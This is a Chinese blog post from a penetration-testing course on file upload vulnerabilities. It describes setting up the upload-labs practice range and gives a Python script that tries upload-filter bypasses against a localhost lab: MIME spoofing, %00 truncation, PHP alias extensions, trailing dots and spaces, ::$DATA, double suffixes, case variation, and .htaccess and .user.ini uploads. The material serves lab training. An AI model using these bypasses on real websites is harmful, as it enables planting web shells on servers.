【小迪安全】Day18-23web漏洞-文件上传

楓椛

已于 2022-11-08 09:20:04 修改

阅读量275

点赞数

分类专栏：小迪安全渗透测试文章标签：安全

于 2022-11-08 08:34:48 首次发布

本文链接：https://blog.csdn.net/qq_44312640/article/details/127743545

版权

渗透测试同时被 2 个专栏收录

18 篇文章 0 订阅

订阅专栏

小迪安全

8 篇文章 1 订阅

订阅专栏

web漏洞-文件上传

文章目录

web漏洞-文件上传

前言

介绍了文件上传漏洞，上传漏洞自动检测脚本。文件上传漏洞类型如下，图片来源：文件上传漏洞总结。

漏洞介绍

什么是文件上传漏洞？

文件上传漏洞指的是网站在文件上传时的安全防护做的不够，使得攻击者能够上传攻击文件到服务器上，由于能直接上传攻击文件，危害很大，因此，文件上传漏洞一般属于高危漏洞。

upload-labs靶场实践

靶场搭建

文件上传漏洞类型如上图，此处直接用upload-labs靶场进行实践，项目地址：https://github.com/c0ny1/upload-labs，靶场搭建有几个需要注意的地方。一是php版本最好按照推荐的版本来，不然有些关卡过不去，二是最好在windows环境下搭建，不然有些关卡过不去，三是如果使用docker方式搭建的话注意提供的docker镜像并未更新到最新且缺少upload文件夹，需要把项目下载下来自己重新编译搭建。

脚本编写

upload-labs靶场各个关卡实践可以参考【渗透测试】文件上传漏洞：upload-labs通关简记等网上文章。此处不多赘述。根据上传漏洞类型编写一下检测脚本。

# 脚本功能待完善
import requests
from urllib3.fields import RequestField
from urllib3 import encode_multipart_formdata

# 挂个代理方便使用burp抓包分析
proxies = {'http': 'http://127.0.0.1:8888'}

pass_num_str = "02"
url = "http://localhost:8084/Pass-"+pass_num_str+"/index.php"

# boundary='---------------------------29377857821120'

def strSort(words):
    tempword = words
    for i in range(2**len(words)):
        int_bin = str(bin(i)).replace("0b","")
        for i in range(len(words)-len(int_bin)):
            int_bin = "".join(("0",int_bin))
        for index, i in enumerate(int_bin):
            if i=='1':
                wordslst = list(words)
                wordslst[index] = wordslst[index].upper()
                words = "".join(wordslst)
        yield words
        words = tempword

def getFiledList( mime, fileName, filePath):
  heards_upload_file = {
    "Content-Disposition": 'form-data; name="%s"; filename="%s"' % ("upload_file", fileName),
    "Content-Type": mime,
  }
  heards_submit = {
    "Content-Disposition": 'form-data; name="%s"' % ("submit"),
  }
  
  # 此处的upload_file和submit名字在这里没用，只做标记作用，主要是heards_xxx发挥作用
  upload_file_field = RequestField("upload_file", open(filePath, 'rb').read(), None, heards_upload_file)
  submit_field = RequestField("submit", "上传", None, heards_submit)
  field_list = [upload_file_field, submit_field]
  return field_list

def getBodyAndHeader(mime="application/octet-stream", fileName="test.php", filePath="D:\\test.php"):

  field_list = getFiledList(mime=mime, fileName=fileName, filePath=filePath)
  body, content_type = encode_multipart_formdata(field_list)
  
  header = {
    "Host":"localhost:8084",
    "User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0", 
    "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language":"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
    "Accept-Encoding":"gzip, deflate",
    "Referer":"http://localhost:8084/Pass-03/index.php",
    "DNT":"1",
    "Connection":"close",
    "Upgrade-Insecure-Requests":"1",
    "Content-Type":content_type,
    # "Content-Type":"multipart/form-data; boundary="+m[1],
  }
  return body, header

def scan_orign():
  print("---开始检查原始的请求---")
  body,header = getBodyAndHeader()
  response = requests.post(url, data=body, proxies=proxies, headers=header)
  text = response.text
  if response.status_code==200:
    print("返回网页长度:%s" % (len(text)))
  else:
    print("请求出错!!!")

def scan_mime(allowMime="image/png"):
  print("---开始检查mime---")
  body,header = getBodyAndHeader(mime=allowMime)
  response = requests.post(url, data=body, proxies=proxies, headers=header)
  text = response.text
  if response.status_code==200:
    print("返回网页长度:%s" % (len(text)))
  else:
    print("请求出错!!!")

def scan_00():
  print("---开始扫描%00截断---")
  body,header = getBodyAndHeader(fileName="test"+pass_num_str+".php%00.png")
  response = requests.post(url, data=body, proxies=proxies, headers=header)
  text = response.text
  if response.status_code==200:
    print("返回网页长度:%s" % (len(text)))
  else:
    print("请求出错!!!")

def scan_php_other_name():
  print("---开始扫描php别名---")
  php_other_name_list = ["php3", "php5" , "phtml"]
  for item in php_other_name_list:
    body,header = getBodyAndHeader(fileName="test"+pass_num_str+"."+item)
    response = requests.post(url, data=body, proxies=proxies, headers=header)
    text = response.text
    if response.status_code==200:
      print("php别名%s返回网页长度:%s" % (item, len(text)))
    else:
      print("请求出错!!!")

def scan_point():
  print("---开始扫描点绕过---")
  point_list = [".", ". ", ". ."]
  for item in point_list:
    body,header = getBodyAndHeader(fileName="test"+pass_num_str+".php"+item)
    response = requests.post(url, data=body, proxies=proxies, headers=header)
    text = response.text
    if response.status_code==200:
      print("扫描点绕过"+item+"返回网页长度:%s" % (len(text)))
    else:
      print("请求出错!!!")

def scan_space():
  print("---开始扫描空格绕过---")
  body,header = getBodyAndHeader(fileName="test"+pass_num_str+".php ")
  response = requests.post(url, data=body, proxies=proxies, headers=header)
  text = response.text
  if response.status_code==200:
    print("返回网页长度:%s" % (len(text)))
  else:
    print("请求出错!!!")

def scan_data():
  print("---开始扫描$DATA绕过---")
  body,header = getBodyAndHeader(fileName="test"+pass_num_str+".php::$DATA")
  response = requests.post(url, data=body, proxies=proxies, headers=header)
  text = response.text
  if response.status_code==200:
    print("返回网页长度:%s" % (len(text)))
  else:
    print("请求出错!!!")

def scan_duble_suffix():
  print("---开始扫描双后缀名绕过---")
  body,header = getBodyAndHeader(fileName="test"+pass_num_str+".pphphp")
  response = requests.post(url, data=body, proxies=proxies, headers=header)
  text = response.text
  if response.status_code==200:
    print("返回网页长度:%s" % (len(text)))
  else:
    print("请求出错!!!")
  
def scan_htaccess():
  print("---开始扫描htaccess绕过---")
  body,header = getBodyAndHeader(fileName=".htaccess", filePath="D:\\.htaccess")
  response = requests.post(url, data=body, proxies=proxies, headers=header)
  text = response.text
  if response.status_code==200:
    print("返回网页长度:%s" % (len(text)))
  else:
    print("请求出错!!!")

def scan_userini():
  print("---开始扫描.user.ini绕过---")
  body,header = getBodyAndHeader(fileName=".user.ini", filePath="D:\\.user.ini")
  response = requests.post(url, data=body, proxies=proxies, headers=header)
  text = response.text
  if response.status_code==200:
    print("返回网页长度:%s" % (len(text)))
  else:
    print("请求出错!!!")

def scan_suffix_case():
  print("---开始扫描后缀大小写绕过---")
  for item in strSort("php"):
    body,header = getBodyAndHeader(fileName="test"+pass_num_str+"."+item)
    response = requests.post(url, data=body, proxies=proxies, headers=header)
    text = response.text
    if response.status_code==200:
      print("扫描后缀大小写%s网页长度:%s" % (item, len(text)))
    else:
      print("请求出错!!!")


def scan_all(url):
  scan_orign()
  scan_mime()
  scan_00()
  scan_php_other_name()
  scan_point()
  scan_space()
  scan_data()
  scan_duble_suffix()
  scan_htaccess()
  scan_userini()
  scan_suffix_case()

def run(url):
  scan_all(url)

if __name__ == '__main__':
    run(url)